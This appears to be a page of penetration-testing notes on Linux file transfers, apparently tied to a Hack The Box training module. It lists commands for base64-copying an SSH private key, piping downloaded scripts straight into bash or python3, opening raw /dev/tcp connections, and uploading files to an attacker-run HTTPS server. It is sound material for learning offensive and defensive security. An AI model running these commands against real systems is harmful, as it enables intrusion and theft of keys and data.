CtrlK

Pentest Notes / File Transfers

Linux File Transfer

Download

Base64 Download

Get the md5 hash - for verification

md5sum id_rsa

Encode to base64 - attacker

cat id_rsa |base64 -w 0

Decode from base64 - target

echo -n '[base64_text]' | base64 -d > id_rsa

Web Downloads

wget

wget [link_to_file] -O /tmp/file.txt

cURL

curl -o /tmp/file.txt [link_to_file]

Fileless Attacks

wget

wget -qO- [link_to_file] | python3
-q for silent, -O- for not saving to a file, directly in terminal

cURL

curl [link_to_file] | bash

Download with bash (/dev/tcp)

Connect to the Target Webserver

exec 3<>/dev/tcp/[MACHINE_IP]/[PORT]

HTTP GET Request

echo -e "GET /[file] HTTP/1.1\n\n">&3

Print the Response

cat <&3

SSH

scp [username]@[MACHINE_IP]:[full_path_to_file] .
ssh must be installed and enabled

Upload

Web Upload

Install module

sudo python3 -m pip install --user uploadserver

Create self signed certificate for HTTPS

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
Web server must not host the certificate, store this somewhere else

Start Webserver

sudo python3 -m uploadserver 443 --server-certificate [location_of_certificate]

Upload files

curl -X POST https://192.168.49.128/upload -F 'files=@[location_1]' -F 'files=@[location_1]' --insecure
--insecure because certificate is self signed

SCP Upload

scp [full_file_location] [username]@[MACHINE_IP]:[folder_to_be_saved_in]

Alternate methods

Files accessible from the location this is executed

Python3

python3 -m http.server

Python 2.7

python2.7 -m SimpleHTTPServer

PHP

php -S 0.0.0.0:8000

Ruby

ruby -run -ehttpd . -p8000

Download the file

wget [MACHINE_IP]:8000/[file_name]

Living off the land

https://academy.hackthebox.com/app/module/24/section/1575